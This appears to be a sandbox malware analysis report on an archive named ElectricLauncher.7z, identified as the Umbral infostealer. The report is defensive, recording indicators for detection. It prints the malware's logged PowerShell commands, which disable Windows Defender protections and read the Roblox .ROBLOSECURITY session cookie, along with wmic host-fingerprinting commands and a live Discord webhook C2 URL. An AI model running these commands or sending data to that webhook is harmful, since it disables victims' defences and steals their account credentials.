Overview

overview

10

Static

static

10

ElectricLauncher.7z

windows7-x64

10

ElectricLauncher.7z

windows10-2004-x64

3

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...-0.dll

windows10-2004-x64

1

ElectricLa...wt.dll

windows7-x64

1

ElectricLa...wt.dll

windows10-2004-x64

1

ElectricLa...ci.dll

windows7-x64

1

ElectricLa...ci.dll

windows10-2004-x64

1

ElectricLa...pr.dll

windows7-x64

1

ElectricLa...pr.dll

windows10-2004-x64

1

ElectricLa...se.dll

windows7-x64

1

ElectricLa...se.dll

windows10-2004-x64

1

ElectricLa...oy.dll

windows7-x64

1

ElectricLa...oy.dll

windows10-2004-x64

1

ElectricLa...em.dll

windows7-x64

1

ElectricLa...em.dll

windows10-2004-x64

1

ElectricLa...et.dll

windows7-x64

1

ElectricLa...et.dll

windows10-2004-x64

1

ElectricLa...a1.dll

windows7-x64

5

ElectricLa...a1.dll

windows10-2004-x64

5

Analysis

  • max time kernel
    60s
  • max time network
    44s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02-07-2024 13:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ElectricLauncher.7z

  • Size

    51.5MB

  • MD5

    cdb5e0ea8a50e1ed5e80f2fc70883550

  • SHA1

    b5075928e63a609ca7b61748a989de77fc092439

  • SHA256

    01342213b45659a27b48f65b73b7043b84faba91ca8f80963560d824097e5ed1

  • SHA512

    73fc72b19754f72ca6122c132851e2a7f95573d7f11a78ac01020a1fdd84e9fe54425de044814f517618224e6c9045ea1316b67f55976f19ae276fbc76e4e8b8

  • SSDEEP

    786432:D1hq7lbHq0joZGThd/SLAqWBHK4A5ffZfewdfONYYGfXF6uIfrNaEU8ruVGwQeB+:DW9Hq0jy8hp9qW41ZWq3XF6S8rKB+

Score
10/10
umbralexecutionspywarestealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1255446681881935924/gRYfgvy5PUJSvSEKVIBTwClcrDYNNTYWbdq4ABW28G1MgE8sEIvS9WFO0VdZkLKmw4gc

Signatures

  • Detect Umbral payload 3 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\ElectricLauncher.7z
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ElectricLauncher.7z"
      2⤵
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2584
  • C:\Users\Admin\Desktop\ElectricLauncher\ElectrickLauncher.exe
    "C:\Users\Admin\Desktop\ElectricLauncher\ElectrickLauncher.exe"
    1⤵
    • Drops file in Drivers directory
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ElectricLauncher\ElectrickLauncher.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1932
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1676
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2924
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:2516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1732
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:2532
    • C:\Users\Admin\Desktop\ElectricLauncher\ElectrickLauncher.exe
      "C:\Users\Admin\Desktop\ElectricLauncher\ElectrickLauncher.exe"
      1⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ElectricLauncher\ElectrickLauncher.exe'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:312
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2216
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        2⤵
          PID:656
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          2⤵
            PID:2952
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            2⤵
              PID:2864
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1292
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              2⤵
              • Detects videocard installed
              PID:2928
          • C:\Windows\system32\taskmgr.exe
            "C:\Windows\system32\taskmgr.exe" /4
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2976

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\7zE81AEB516\ElectricLauncher\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
            Filesize

            153B

            MD5

            1e9d8f133a442da6b0c74d49bc84a341

            SHA1

            259edc45b4569427e8319895a444f4295d54348f

            SHA256

            1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b

            SHA512

            63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
            Filesize

            7KB

            MD5

            3cf3df757aa231b29717f7517370b482

            SHA1

            68359ea9397f9dcecd2bc67bf972665ff73cace7

            SHA256

            22bd9800dd6904d2d6e1d5c0ff1594256709682415a3dc2d38ed593f9451e16c

            SHA512

            8b67b131ebd8ea81648cb4add0233fae4dc25419fa6abd9ce9dca27e2db5997d87dd087bf98312aa1ee72be8f142a272b1965e473e68d30698806db09a3a1939

            Download Submit

          • C:\Users\Admin\Desktop\ElectricLauncher\ElectrickLauncher.exe
            Filesize

            495KB

            MD5

            3c764a3a72eefe5074751c4955df77ad

            SHA1

            670efacebbeab02a31b69cde6d3f949816c45946

            SHA256

            c8413e399a6ebd847f90bb3cde101d647aeef296baf4157141ab47fc2ae82b14

            SHA512

            c640dec6bb9cb980cdf998d93736759ecb0a0a7b124a5dc0cd08b15ac984d5d131044d64d154a18ccf2bf07c39cd29aecaecef48873c41fcb85e82fd3f59120f

            Download Submit

          • C:\Windows\System32\drivers\etc\hosts
            Filesize

            2KB

            MD5

            577f27e6d74bd8c5b7b0371f2b1e991c

            SHA1

            b334ccfe13792f82b698960cceaee2e690b85528

            SHA256

            0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

            SHA512

            944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

            Download Submit

          • memory/312-641-0x0000000002920000-0x0000000002928000-memory.dmp

            Filesize

            32KB

            Download

          • memory/1488-604-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

            Filesize

            2.9MB

            Download

          • memory/1488-605-0x0000000001D20000-0x0000000001D28000-memory.dmp

            Filesize

            32KB

            Download

          • memory/1732-630-0x0000000001E70000-0x0000000001E78000-memory.dmp

            Filesize

            32KB

            Download

          • memory/1756-592-0x0000000000BA0000-0x0000000000C22000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1800-635-0x0000000001130000-0x00000000011B2000-memory.dmp

            Filesize

            520KB

            Download

          • memory/2864-598-0x00000000028E0000-0x00000000028E8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2864-597-0x000000001B620000-0x000000001B902000-memory.dmp

            Filesize

            2.9MB

            Download

          • memory/2976-678-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

            Download

          • memory/2976-677-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

            Download